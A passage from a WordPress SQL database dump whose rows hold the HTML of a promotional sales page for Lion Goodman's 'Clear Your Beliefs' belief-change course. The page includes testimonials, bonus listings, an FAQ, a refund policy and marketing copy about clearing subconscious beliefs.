step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'copy of cyb', '', 'inherit', 'closed', 'open', '', '936-revision-v1', '', '', '2014-06-17 16:35:33', '2014-06-17 21:35:33', '', 936, 'http://clearyourbeliefs.com/936-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(940, 4194, '2014-06-17 16:38:21', '2014-06-17 21:38:21', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, 